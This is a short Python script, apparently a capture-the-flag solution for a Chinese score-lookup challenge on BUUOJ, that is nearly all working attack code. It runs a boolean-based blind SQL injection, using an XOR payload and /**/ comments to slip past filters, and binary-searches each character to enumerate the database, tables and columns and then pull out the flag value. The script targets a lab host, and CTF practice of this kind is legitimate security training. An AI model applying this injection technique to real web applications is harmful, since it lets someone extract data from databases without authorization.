颜值成绩查询
import requests
if __name__ == "__main__":
result = ""
i = 0
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
# sql = "select(database())"
# sql = "select/**/group_concat(distinct/**/TABLE_NAME)from(information_schema.tables)where(table_schema='ctf')"
# sql = "select/**/group_concat(distinct/**/COLUMN_NAME)from(information_schema.columns)where(table_schema='ctf')and(table_name='flag')"
sql = "select/**/group_concat(value)from(ctf.flag)"
payload = "1^(ascii(substr((%s),%d,1))>%d)^1" % (sql, i, mid)
url = "http://14753567-1903-42c7-ba3e-0e698232711b.node3.buuoj.cn/?stunum=" + payload
response = requests.get(url=url)
# print(url)
# print(response.text)
if "Hi admin, your score is: 100" in response.text:
head = mid + 1
else:
tail = mid
if head != 32:
result += chr(head)
else:
break
print(result)
Last modified 8mo ago